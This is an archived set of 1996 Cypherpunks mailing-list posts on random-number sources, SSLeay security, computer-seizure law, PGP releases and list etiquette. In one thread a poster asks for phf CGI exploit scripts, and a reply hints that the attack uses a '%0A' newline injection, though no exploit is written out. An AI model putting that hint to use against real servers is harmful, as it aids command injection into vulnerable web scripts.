From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pavel Korensky <pavelk@dator3.anet.cz>
Date: Fri, 29 Nov 1996 03:32:06 -0800 (PST)
To: paul@fatmans.demon.co.uk
Subject: Re[2]: Sound card as a random number source ??
In-Reply-To: <849204012.65013.0@fatmans.demon.co.uk>
Message-ID: <199611291130.MAA00171@zenith.dator3.anet.cz>
MIME-Version: 1.0
Content-Type: text/plain


paul@fatmans.demon.co.uk wrote:
> 
> I`m not entirely sure about the possibility of correlations in any of 
> these sources but they aren`t really a good idea because all can be 
> accessed by someone else. eg. Steal your random noise audio tape, 
> sample dolby decoded sound at the same time as you etc.

And what if I will use FM receiver, tuned on some channel where is the noise.
If the potentional attacker don't know the what channel was tuned, he is not
able to reproduce this IMHO. Of course, maybe it is possible to record the whole
spectrum to tapes, but I think that the noise will change when recorded and
played back from tape.

Bye PavelK


--
****************************************************************************
*                    Pavel Korensky (pavelk@dator3.anet.cz)                *
*     DATOR3 Ltd., Modranska 1895/17, 143 00 Prague 4, Czech Republic      *
*  PGP key fingerprint: 00 65 5A B3 70 20 F1 54  D3 B3 E4 3E F8 A3 5E 7C   *
****************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alzheimer@juno.com (Ronald Raygun Remailer)
Date: Fri, 29 Nov 1996 10:15:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: Copyright violations
Message-ID: <19961129.121618.11423.1.alzheimer@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


 
News Release (USCIB): Tuesday, November 26, 1996
 
Banks Making Sweeping Changes in Operations to Meet
Challenges of International Markets
 
Study finds international banks applying mix of reengineering and new
technology to improve operations. In an effort to reduce costs and boost
productivity, international banks are reengineering their operations
departments and updating technology at increased rates, according to a
two-year study of top international banking operations officers conducted
by
the U.S. Council on International Banking (USCIB) and the USCIB
Foundation. 
 
Operations departments, which generally maintain activity other than
retail
banking or customer service, are becoming increasingly critical in
international
banking, due to the explosive growth of transnational business and the
convergence of commercial and investment bank activities. Such industry
developments have left many corporate clients looking for "one-stop
shopping" for their banking matters as an easier way to meet their
financing
needs. 
 
At the USCIB Annual Conference in mid-November, it was noted that
banks are going to have to employ more agility in order to satisfy their
corporate clients' escalating demands for simplicity. The increasing cost
of
running an operations department is also forcing executives to take a
sharper
look at where they can trim their budgets. 
 
According to the USCIB study the annual operations department budget is
now $ 15 million, compared with $ 9 million in 1995, an increase of more
than sixty-six (66%) percent. In more than half (52%) of the operations
departments surveyed, labor costs accounted for fifty (50%) percent or
more
of their budgets. 
 
To reduce costs, executives have turned to reengineering and downsizing.
Thirty six (36%) percent have reengineered their departments, and of
those,

sixty-three (63%) percent reported the action had reduced costs and
improved productivity. 
 
Nearly one-half (49%) of operations executives have either downsized
their
departments in the past year or plan to in the one to come. In addition,
all of
the executives surveyed plan to invest in technology over the next 12
months
in order to speed up operations and handle the increase in international
transaction banking. Ninety-six (96%) percent of respondents say they
will
invest in technology, up from eighty-nine (89%) percent in 1995. 
 
Just under half of surveyed operations departments use a technology
system
that is over three years old, and sixty-three (63%) percent of
prospective
buyers expect to spend more than $100,000 to replace or upgrade aging
equipment in the next year. 
 
The U.S. Council on International Banking (USCIB) is a national
association
representing more than 320 U.S. and foreign-based financial institutions
with
operations or subsidiaries in the United States. 
 
One of the oldest U.S. banking associations, the USCIB works to
standardize international banking rules and practices, serves as advocate
to
U.S. and international regulatory bodies on policy issues that affect its
membership, and provides training and information to bankers throughout
the
United States. 
 
This study included 55 of its members and other executives and was
conducted in late July and August, 1996.
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Slothrop" <slothrop@poisson.com>
Date: Fri, 29 Nov 1996 13:17:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: A URL for Dimitri
Message-ID: <199611292116.NAA04015@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


http://www.torah.org/learning/halashon/

jd
--
Jason Durbin
Stop Reading Here<--




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com
Date: Fri, 29 Nov 1996 10:48:52 -0800 (PST)
To: deviant@pooh-corner.com
Subject: Re: cgi-bin vulnerability
Message-ID: <199611291848.NAA16684@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


i think that i understand what you are trying to say, however, my purpose
in asking for this information has nothing to do with what i know.
i am pulling together a series of tests for our firewall, and am not
satisfied that the entries/cracks that i know are the only ones that exist,
therefore, i ask others for their input.  seems reasonable, doesn't it?

thanks for you response.

cheers,
	-paul

> From deviant@pooh-corner.com Fri Nov 29 12:55:52 1996
> Date: Fri, 29 Nov 1996 17:54:10 +0000 (GMT)
> From: The Deviant <deviant@pooh-corner.com>
> X-Sender: deviant@random.sp.org
> To: pjb@ny.ubs.com
> cc: cypherpunks@toad.com
> Subject: Re: cgi-bin vulnerability
> Organization: The Silicon Pirates
> MIME-Version: 1.0
> Content-Type> : > TEXT/PLAIN> ; > charset=US-ASCII> 
> Content-Length: 1025
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> On Fri, 29 Nov 1996 pjb@ny.ubs.com wrote:
> 
> > does anyone have a pointer to any sample scripts for exploiting the cgi-bin/phf
> > vulnerability? 
> > 
> > cheers,
> > 	-paul
> > 
> 
> If you can't figure out how, you probably don't need to know. (actually,
> its so simple the average high school student could probablyfigure it out,
> if they knew what %0A meant... oops.. wasn't supposed to tell you that...
> ;)
> 
>  --Deviant
>    PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39
> 
> "All in all is all we are."
> 		-- Kurt Cobain
> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQEVAwUBMp8jSjCdEh3oIPAVAQFkoAf+Nu62ObHyWHgDvkWAqqH7QTw4svfkELTB
> d5E8S1ghkyxL1219LwGljelQ+uHaZt4EGB/nnDfQo7H2J9fMDR1CLJRC+h95xxKM
> mKuAVbVT1W3nPm4+WP5DIplMvF/xVmextdbGLmAfYQksXQ4uGNRuaawS9G2ffYLP
> erBEN9XuxvVY0AnTYCErnpDdOhh4BNTi2+os86Ea+mXt2FG3D8y0pdfRSnOJm2YU
> yvQ7pUrMfhl9DGauc+lvb42B8OXWElnjYIFloxWr+rxACzS6NCbGF3izjfTv+2HX
> tRZUuwYNee3j+p7kDY9ebANJqWUcMtR9To5za1/vlA4QAtPl5HsaVw==
> =3/ok
> -----END PGP SIGNATURE-----
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Laurie <ben@gonzo.ben.algroup.co.uk>
Date: Fri, 29 Nov 1996 07:40:51 -0800 (PST)
To: Anonymous <lucifer@dhp.com>
Subject: Re: SAFEPASSAGE BRINGS STRONG CRYPTO TO WEB BROWSERS WORLDWIDE
In-Reply-To: <199611290102.UAA13822@dhp.com>
Message-ID: <9611291437.aa29729@gonzo.ben.algroup.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:
> 
> > From: Ben Laurie <ben@gonzo.ben.algroup.co.uk>
> > 
> > I think I would discuss this with the author before going public, to give
> > him the usual opportunity to clean up before all hell breaks loose. However,
> > that is what I'd call "work" rather than "fun", so I'd want paying for it.
> 
> Translation:  You don't really know what you are talking about.

I know that personal attacks are the currency on this list, but I may as well
point out that it is precisely because I do know what I'm talking about that I
can reasonably expect to be paid to do the talking.

Cheers,

Ben.

-- 
Ben Laurie                Phone: +44 (181) 994 6435  Email: ben@algroup.co.uk
Freelance Consultant and  Fax:   +44 (181) 994 6472
Technical Director        URL: http://www.algroup.co.uk/Apache-SSL
A.L. Digital Ltd,         Apache Group member (http://www.apache.org)
London, England.          Apache-SSL author




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Sat, 30 Nov 1996 03:12:34 -0800 (PST)
To: pavelk@dator3.anet.cz
Subject: Re: Re[2]: Sound card as a random number source ??
Message-ID: <849351681.94527.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



 
> And what if I will use FM receiver, tuned on some channel where is the noise.
> If the potentional attacker don't know the what channel was tuned, he is not
> able to reproduce this IMHO. Of course, maybe it is possible to record the whole
> spectrum to tapes, but I think that the noise will change when recorded and
> played back from tape.


It might possibly be random enough, especially if you use a tape 
recorder of a reasonably poor quality, thus inducing wow and flutter 
noise to the recording before it is sampled. anyone else care to 
comment?

 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 29 Nov 1996 13:36:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: LON_ely
Message-ID: <1.5.4.32.19961129213336.0068b898@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 11-25-96:

 "Intel Enters Encryption Market With HP For PCMCIA Card "

 So far, HP is the only computer company offering the
 combination PCMCIA and smart card encryption hardware.

 VLSI and Tandem are developing an encryption chip for use 
 on a PCMCIA card. VLSI built the infamous Clipper chip 
 developed by the NSA that was shot down as a proposed 
 government standard after overwhelming industry opposition.

 In a separate development, National Semi, one of two suppliers 
 of the Fortessa encryption card, scaled back its government 
 encryption operations. Program delays, slim margins, and 
 contract disputes with the NSA disillusioned the chip maker.

-----

 LON_ely  (5 kb)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Fri, 29 Nov 1996 09:55:54 -0800 (PST)
To: pjb@ny.ubs.com
Subject: Re: cgi-bin vulnerability
In-Reply-To: <199611291506.KAA16645@sherry.ny.ubs.com>
Message-ID: <Pine.LNX.3.94.961129175308.3227A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 29 Nov 1996 pjb@ny.ubs.com wrote:

> does anyone have a pointer to any sample scripts for exploiting the cgi-bin/phf
> vulnerability? 
> 
> cheers,
> 	-paul
> 

If you can't figure out how, you probably don't need to know. (actually,
its so simple the average high school student could probablyfigure it out,
if they knew what %0A meant... oops.. wasn't supposed to tell you that...
;)

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

"All in all is all we are."
		-- Kurt Cobain


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMp8jSjCdEh3oIPAVAQFkoAf+Nu62ObHyWHgDvkWAqqH7QTw4svfkELTB
d5E8S1ghkyxL1219LwGljelQ+uHaZt4EGB/nnDfQo7H2J9fMDR1CLJRC+h95xxKM
mKuAVbVT1W3nPm4+WP5DIplMvF/xVmextdbGLmAfYQksXQ4uGNRuaawS9G2ffYLP
erBEN9XuxvVY0AnTYCErnpDdOhh4BNTi2+os86Ea+mXt2FG3D8y0pdfRSnOJm2YU
yvQ7pUrMfhl9DGauc+lvb42B8OXWElnjYIFloxWr+rxACzS6NCbGF3izjfTv+2HX
tRZUuwYNee3j+p7kDY9ebANJqWUcMtR9To5za1/vlA4QAtPl5HsaVw==
=3/ok
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Fri, 29 Nov 1996 08:52:33 -0800 (PST)
To: Bryce <bryce@digicash.com>
Subject: Re: The House Rules At The Permanent Virtual Cypherpunks Party
In-Reply-To: <199611281454.PAA12144@digicash.com>
Message-ID: <Pine.HPP.3.91.961129170630.7957A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



> Rule 2:  Don't forward articles from other forums to
> cypherpunks.  We can find it ourselves the same place you did

This is not universally true. Everyone doesn't have access to
a functional News server or even to the Web, and some interesting
stuff could come from closed commercial sites etc.

But even if everyone had global access, I think there is a place for
forwarded articles on the CP list. It's a convenient way to keep
up with the happenings to passively watch on-topic items drop into
one's mailbox or to be able to request longer pieces with very few
keystrokes, jya-style. The most lazy of us will hardly even light
up our browsers for a maybe-interesting URL.

The problem is off-topic or quasi-on-topic forwards, including EPIC/EFF
kind of announcements. And all forwards would benefit from a personal
comment by the forwarder (at the beginning of the mail, NOT after the
10 screens document) where he explains what is interesting cp-wise.


Asgaard





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Laurie <ben@gonzo.ben.algroup.co.uk>
Date: Fri, 29 Nov 1996 11:03:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: SSLeay security
Message-ID: <9611291800.aa00402@gonzo.ben.algroup.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


It seems I have expressed myself poorly. My point was that, as far as I am
aware, SSLeay has not been widely reviewed. A lot of people use it, sure, but
that is not review.

Since there are obvious defects in the code, from a security point of view,
such as failure to scrub keys, it wouldn't get a clean bill of health from me.

Of course, these kinds of defects require other defects in the user's security
policy (such as running on an operating system which permits free access to
memory) to exploit.

There may or may not be worse problems. I don't know. And I won't know until
either it becomes important to me, someone pays me to find out, or someone else
points them out.

I'm not saying that I'm aware of defects which are not obvious but my
experience in using it suggests that it may have them - it isn't that hard to
crash, and where there are crashes lurk possible security holes. Tracking
these down is where it stops being fun. At least for me.

Cheers,

Ben.

-- 
Ben Laurie                Phone: +44 (181) 994 6435  Email: ben@algroup.co.uk
Freelance Consultant and  Fax:   +44 (181) 994 6472
Technical Director        URL: http://www.algroup.co.uk/Apache-SSL
A.L. Digital Ltd,         Apache Group member (http://www.apache.org)
London, England.          Apache-SSL author




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 29 Nov 1996 18:28:04 -0800 (PST)
To: Bryce <bryce@digicash.com>
Subject: Re: The House Rules At The Permanent Virtual Cypherpunks Party
In-Reply-To: <Pine.HPP.3.91.961129170630.7957A-100000@cor.sos.sll.se>
Message-ID: <329F9BA0.541B@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Asgaard wrote:
> > Rule 2:  Don't forward articles from other forums to
> > cypherpunks.  We can find it ourselves the same place you did

[snippo]

I wrote a short response to one point in the original post, and it got
"lost" somehow.

Bryce (I think) said words to the effect that "We (subscribers) are doing
something with John's computer, etc.", as though the list subscribers are
actually operating John's computer, with John's kind permission and over-
view (as though children being supervised in school).

What I said was:  I don't *do* anything with John's computer, I merely
mail messages with an address on them, and John can remail or dispose of
those messages as he wishes, as long as he doesn't modify them or otherwise
use them for any purpose besides what they were intended for.

Bryce's (I think) writing was clearly an example of the kind of double-
speak that 1984-ish censors use to justify their actions, and I for one
cannot let that kind of B.S. go unchallenged.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Rosen" <mrosen@peganet.com>
Date: Fri, 29 Nov 1996 15:40:46 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Announcement: Very Good Privacy
Message-ID: <199611292343.SAA15315@mercury.peganet.com>
MIME-Version: 1.0
Content-Type: text/plain


	I have written an encryption program called Very Good Privacy for Windows
95/NT. It supports drag-and-drop encryption using the following algorithms:
ASCII (Caesar), BlowFish, DES, IDEA, NewDES, RC4, Safer SK-128, and
Vigenere. After the files are encrypted, the user has the option of
securely deleting the source files using a stream of random text. Very Good
Privacy is shareware with a $5-$10 registration fee. Please note: Pretty
Good Privacy is only "pretty good" but Very Good Privacy is "very good."
:-)

VGP can be downloaded at: http://www.geocities.com/SiliconValley/Pines/2690
If you have any questions, please e-mail vgp@cryogen.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Fri, 29 Nov 1996 11:33:02 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: denial of service and government rights
Message-ID: <199611291933.MAA05426@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


- ----------------------------------------------------------------------


        read the last line. the usual rules of evidence which give
    the feds the right to anything they well please --constitutional
    or not!  if seizure of a victims property can by obtained a 
    search and sieze warrant for the victimized "object,"  a whole
    new mode of regulation has begun.

        all the government will do to suppress sites as they please,
    is to initiate a few attacks themselves --and they will.

        I got tired of paying Lexus $150 for idle months after dumping
    West for almost $500/month --otherwise I would run down the Feds
    kangaroo ruling which seems to grant them this absurd right. 
    Several on the list are still maintaining accounts...  ?

        ====== begin forwarded text ======

Computer Attacks Show New Patterns

The major trends in computer break-ins involve denial of service 
and data-driven attacks, says a Department of Justice lawyer.  
Denial of service occurs when an attacker "bombs" an Internet 
service provider with so many e-mail messages that the server 
becomes overloaded and shuts down. Data-driven attacks occur when 
a virus program is disguised as a data-only file.  The file can be 
hidden in a Java program on a Web page, and when a visitor clicks 
on the site, he or she unwittingly downloads the virus.  A computer 
crime consultant with SAIC warns that these attacks can be launched 
on an innocent party's Web server, but once that happens, the server 
can become the subject of a wiretap and a search warrant.  "The title 
of your computer vests with the government as soon as a hacker uses 
it to commit a crime," he says.  

[BNA Daily Report for Executives 25 Nov 96 A20]

    ====== end forwarded text ======

- --
 "In nature, stupidity gets you killed.
   In the workplace, it gets you promoted.
    In politics, it gets you re-elected."
        --attila


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMp83lr04kQrCC2kFAQFYuAP/bLbraU6rFFLQZpFfsvxiGrbm7W26p3t9
GffgoN/LA6OBqIEUpAdPxGoVqco7RDpHHprhObEV4MorR3BsK6pl5EVNbc3Xp7OC
pxFThx0O08bscdmVBSYAUsU2hXMuW2AiuAkxBwCRdaG0bxswr97JQI9ye+pjKTPw
cARrd7QLmz4=
=vUe3
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Fri, 29 Nov 1996 19:56:45 -0800 (PST)
To: attila@primenet.com
Subject: Re: denial of service and government rights
Message-ID: <3.0.32.19961129195752.00730f7c@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I see two general arguments that go in the direction of the SAIC
consultant's comments:

1.	Seizure & retention as evidence or instrumentality of a crime - e.g., if
someone breaks into my house, steals my gun, and uses it to shoot someone,
it'll be a long damn time before I get my gun back. The prosecution will
likely want to do various forensic tests, the defense may want to do its
own, the prosecutor will want to wave it around at trial, it may even go
back to the jury room to pass around while they deliberate - and if there's
a mistrial/new trial granted, the cycle starts again. (Off of the top of my
head, I can't remember what happens to physical evidence after trial but
during appeal.) Generally, people who are unfortunate enough to have
property which gets sucked into a criminal investigation/trial are just out
of luck. Bummer. I don't see any reason why this wouldn't be true for a
computer. Fed.Rul.Crim.Pro. 41(b)(1) allows the seizure (but seizure is not
forfeiture) of "property that constitutes evidence of the commission of a
criminal offense". 

2. 	Forfeiture of the instrumentality of a crime, or of a nuisance - cf.
_Bennis v. Michigan_ <http://www.law.cornell.edu/supct/cases/94-8729.html>,
the recent Supreme Court case where the "Justices" (cough cough) upheld the
forfeiture of a wife's half interest in a car which was used (without her
knowledge/consent) by her husband to facilitate the crime of prostitution.
The Supreme Court rejected the idea that the Fifth Amendment's takings
clause or the Fourteenth Amendment's due process clause prevents the
forfeiture of the instrumentality of a crime without a showing of
culpability on the part of the owners. Some forfeiture statues (e.g., 21
USC 881, 1989 Oregon Laws Chapter 791, both re drug-related forfeitures)
provide for an "innocent owner" defense to forfeiture, but the Supreme
Court doesn't seem to think that's required as a matter of constitutional
law.  Fed.Rul.Crim.Pro 41(b)(3) allows the seizure of "property designed or
intended for use or which is or has been used as the means of committing a
criminal offense".

 There's an excellent resource available re computer search & seizure at
<http://www.epic.org/security/computer_search_guidelines.txt> - it's the US
DOJ's "Guidelines for Searching & Seizing Computers", pried loose by an
EPIC FOIA request and scanned.

But there's a big difference between "seizure" and "forfeiture". It's
possible that recent legislation has done for computer crime what the drug
forfeiture laws have done with respect to title in property - 21 USC 881(h)
indicates that "All right, title, and interest in property described in
subsection (a) of this section [e.g., property used in connection with a
drug crime] shall vest in the United States upon commission of the act
giving rise to forfeiture under this section." Given the innocent owner
defenses available in an 881 forfeiture, (h) sounds scarier than it works
out to be.

So yes, there may be a statute which gives title to the government in
computers used to commit crimes, and no, the Supreme Court won't
necessarily care about an "innocent owner". (Then again, it may make a
difference if we're talking about a computer owned by a corporation with
political clout, instead of the half-owner of a $600 car used for
surreptitious blow jobs. Your cynicism may vary.) I can't seem to find any
such statute, but like Ben Laurie pointed out w.r.t. security reviews,
there's a line between what folks are willing to do for free, and what
feels like work. Digging through a lot of teeny type in the Federal
Register/Congressional Record isn't my idea of a good time, so I'll leave
the "is there a statute?" question for someone else. I poked around on
EPIC's web site and thomas.loc.gov and in 18 USC without finding a computer
crime seizure statute, but I may just be too tired. :( 
 
At 07:26 PM 11/29/96 +0000, Attila wrote:

>        I got tired of paying Lexus $150 for idle months after dumping
>    West for almost $500/month --otherwise I would run down the Feds
>    kangaroo ruling which seems to grant them this absurd right. 
>    Several on the list are still maintaining accounts...  ?
>
>        ====== begin forwarded text ======
>
>Computer Attacks Show New Patterns
>
>The major trends in computer break-ins involve denial of service 
>and data-driven attacks, says a Department of Justice lawyer.  
>Denial of service occurs when an attacker "bombs" an Internet 
>service provider with so many e-mail messages that the server 
>becomes overloaded and shuts down. Data-driven attacks occur when 
>a virus program is disguised as a data-only file.  The file can be 
>hidden in a Java program on a Web page, and when a visitor clicks 
>on the site, he or she unwittingly downloads the virus.  A computer 
>crime consultant with SAIC warns that these attacks can be launched 
>on an innocent party's Web server, but once that happens, the server 
>can become the subject of a wiretap and a search warrant.  "The title 
>of your computer vests with the government as soon as a hacker uses 
>it to commit a crime," he says.  
>
>[BNA Daily Report for Executives 25 Nov 96 A20]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMp+GSv37pMWUJFlhAQHEmgf+IfYnc0w47Ja/ETFlt08uHA7OWV9NJetd
l3gA4av00CwST1FRtdizAC0C4t2MHT6kzHb1j8NzncazAvgjdTEa9Vd31UTR0HgU
4dYbu9e+YtYT6NcaD4HszewxVo/gfpUKBobOA2lVe1QLR1Dzqbx2cbsmxKgDsdzE
Y/TATalZ7c7BkAXJBBgmXs8QYpsBWGUpmf8PUB3731MpGyF6H4gpmssxefjvGghE
eQ27k3hkPlZiKGI5MeZrFhUZXJj3VPu4B3/gC+ZFm2M8Jh4z5Wo4r7w690eb9hky
dGkUzQOb6sdh3ee1oJzwNWXE7R6DCL+3uiGA8Slt0hPOSBo2LBY2Zg==
=dQn5
-----END PGP SIGNATURE-----

--
Greg Broiles                | US crypto export control policy in a nutshell:
gbroiles@netbox.com         | 
http://www.io.com/~gbroiles | Export jobs, not crypto.
                            | 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Fri, 29 Nov 1996 12:12:50 -0800 (PST)
To: Asgaard <asgaard@Cor.sos.sll.se>
Subject: Re: The House Rules At The Permanent Virtual Cypherpunks Party
In-Reply-To: <Pine.HPP.3.91.961129170630.7957A-100000@cor.sos.sll.se>
Message-ID: <199611292013.NAA06282@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


- ----------------------------------------------------------------------

In <Pine.HPP.3.91.961129170630.7957A-100000@cor.sos.sll.se>, on 11/29/96 
   at 05:55 PM, Asgaard <asgaard@Cor.sos.sll.se> said:

::> Rule 2:  Don't forward articles from other forums to
::> cypherpunks.  We can find it ourselves the same place you did

::This is not universally true. Everyone doesn't have access to a
::functional News server or even to the Web, and some interesting stuff
::could come from closed commercial sites etc.
::
        for instance, I read a lot of liberal hogwash lists [know thine
    enemy].  there are lists after lists about lists. sorting out the
    precisely cut and trimmed info is hard --and there is not time to
    read a man who is being paid by the word!  

    good summaries with pointers is essential.
      
:: [snip] ...to be able to request longer pieces with very few keystrokes,
::jya-style. 
::
        john provides an extremely valuable service by covering a broad
    spectrum of sources.  since I read others, I am considering using
    the auto-respond features of procmail to do the same.  however, I
    sure wont cover as much ground as john does!

:: The most lazy of us will hardly even light up our browsers
::for a maybe-interesting URL.
::
        unfortunately, that is too true --even when your mail browser 
    will pass the URL to the browser which is often in the background
    anyway.

::The problem is off-topic or quasi-on-topic forwards, including EPIC/EFF
::kind of announcements. 
::
    hard to discern sometimes

::And all forwards would benefit from a personal
::comment by the forwarder (at the beginning of the mail, NOT after the 10
::screens document) where he explains what is interesting cp-wise.

        ABSOLUTELY!  always put your comments and the "pointer" out front 
    --even if you are planning interline comments.

- --
  without arms they do not resist; 
    without communication they know not what to resist.
        -attila

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMp9DRb04kQrCC2kFAQH7FAP/U0Xrs8/w61tudGrDmj/XpoLFXCsWdq0l
xab+rBby242AVJN0BxULUTVH+F4hblIcJGy52gWTKdwcKHS9lShmhgTFbRpepO+L
GLdX+LV6fiBr4SoyD+1+pQBdzmYGyjmXiG3Xp8JoB9q2OBTdJbgoLsCHB6dX97Pe
KR3Z7XsowSw=
=WUSX
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Fri, 29 Nov 1996 11:23:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Seditious Cable!
Message-ID: <199611291923.UAA25308@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


 dlv@bwalk.dm.com wrote to All:

 d> Doug Barnes <cman@c2.net> writes:
 >> (Taiwan story warning...) This reminds me of the pirate cable
 >> TV wars, which hit their peak during my stay there --

[...]

 d> Now, what would the U.S. government (state or los federales) do in a
 d> similar situation? They'd probably fine any resident found with a
 d> cable TV thousands of dollars and if that didn't work, they'd start
 d> jailing people. Maybe even burn a few TV viewers, a la Waco. :-)

And these are the folks you want to maintain your key escrow?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Crompton <sunray@globalnet.co.uk>
Date: Fri, 29 Nov 1996 12:58:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: PGP 2.63ui support for the MAC
Message-ID: <1.5.4.16.19961129205846.32e7ceb2@mail.globalnet.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Subject: PGP 2.63ui support for the MAC

I have received a few inquiries about support for the Macintosh.

Unfortunately, the small team working on PGP 2.63ui does not have
the expertise or tools to support the MAC or platforms other than
MSDOS.

However, since we have published our source code, we welcome
participation by people who want to add support for the MAC or
other platforms.  All we ask is that any changes be controlled by
conditional compile statements so that we can maintain a unified
source code for all platforms.

American friends who are concerned about legal difficulties may
contact me via encrypted Email in strictest confidence.

Finally, I understand that Stale's MIT-based version of PGP does
have a good selection of support for the MAC and various other
platforms. We are not going to object strenuously if some of our
enhancements, now unique to 2.63ui, find their way into a future
release of Stale's version.

Steve Crompton 100645.1716@compuserve.com  (preferred)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Requires PGP version 2.6 or later.

iQEVAwUBMp9MIhRHWQsRmI2RAQGD/wgAuuBRclY2ovL7uZ7nukcR9maz85GSCYS7
gbYcToxWhZMA3YMMDmV8260qG9BmF0dHoNt39HfEjcordiTU2gLOTmyWqTIWXyA3
uRuKwZQiGPc2bxf+p62G0KdXEdEPcJ98vZWAxVkZwNDlkTg8FZ+O0NsQOPkBMSCO
cE+kiJDk/71CEMwBhu4Q2QN9KBtX+MpcOvT6v1M5vIFAtO31OHaiz/0/tBCitpDP
ukNX8Ntmht+/Izmma3lQaiuFo3i6pXH7qPxKBE38ZNU+w/CtiEPoy/uWN69L3l2D
6RIBbtdvbIkE6ZWotuPcsy/TxqJNsDdnztksfP2EpoKCG9vnHoaU3w==
=8vJt
-----END PGP SIGNATURE-----


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2i
Comment: Requires PGP version 2.6 or later.

mQCNAy+FS/kAAAEEAKsKQxcaOw8GQpGXEm4hCfqWyeVlh2Ai9AYvXxPy1VrWYNUu
NDafHwhfoAjM1apHT6CcISw9D4NNeJtXWutv8mKQjumsITzGZ/mSRlOLzxTbdOtD
qyuXjSWt2TIm+ffttbZLsurP8genv4LFDHxGiVeKaAA64CnI4wc2DukbwCfhAAUR
tC1TdGVwaGVuIENyb21wdG9uIDwxMDA2NDUuMTcxNkBjb21wdXNlcnZlLmNvbT6J
AJUDBRAw062s3ic1/dqHwMcBATFuA/9HeAnZWL8MVHSx3/Ux5vRKxpAqrKs9llgN
5RmaGX+lBW6GASnSdpyrBXTG7+li/X57Jmgq04X3rWZm34Qdo6D2266aKkXc9PkM
njuMpmw29Ejza5VYUlz8jMm5vUDEgaPtA5a4JL9+HLhCPCv298177kFZrZBvUgll
1/PO1bpTaokAlQMFEC/tv3UuGDEtkMU5FQEBxYAD/Rsbr7PlHSOns3WsULqmdU9Z
1vKrlmp/sma950jMRC75tJNE1R0eBcE+1eHWkpDhcQ2rlpVTiEcO3IcOBv4ycAjG
ZeVcv7hEmMd+Rf+75L/Y0DAZEB9SjX46TTagEYAURK/qWMl47nZpQiyo2VyM/5Br
3fGzuUH/ZE8gjhdYVTQE
=WBzQ
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
